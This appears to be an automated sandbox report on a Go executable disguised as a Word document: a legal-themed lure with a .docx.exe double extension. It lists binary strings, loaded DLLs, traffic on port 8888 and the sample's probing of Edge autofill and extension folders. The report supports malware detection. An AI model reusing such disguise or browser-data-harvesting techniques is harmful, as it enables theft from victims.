unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=mime: bogus characters after %%: %qunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlineexpected unsigned integer; found %snon-comparable types %s: %v, %s: %vbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesscrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)unpaired removeDep: no %T dep on %T2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00MakeAggregate function returned niltransform: short destination bufferrange can only initialize variablesP224 point is the point at infinityP256 point is the point
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: flag verification failed: password-check not found%s has arguments but cannot be invoked as functioncrypto/elliptic: nistec rejected normalized scalarx509: missing ASN.1 contents; use ParseCertificatex509: invalid RDNSequence: invalid attribute valuex509: RSA public exponent is not a positive numberchacha20: SetCounter attempted to rollback counterhttps://microsoftedge.microsoft.com/addons/detail/edwards25519: invalid SetUniformBytes input length %3d \| %10d \| %13.5f \| %13.5f \| %13.5f \| %13.5f
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Section loaded: mswsock.dll	Jump to behavior

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static file information: File size 12996608 > 1048576

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x5fc400
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x5a3000

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains sections with non-standard names

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Static PE information: section name: .xdata
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Static PE information: section name: .symtab

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: docx.exe

Static PE information: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49704

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2121298740.0000017DA0EB8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation	Jump to behavior
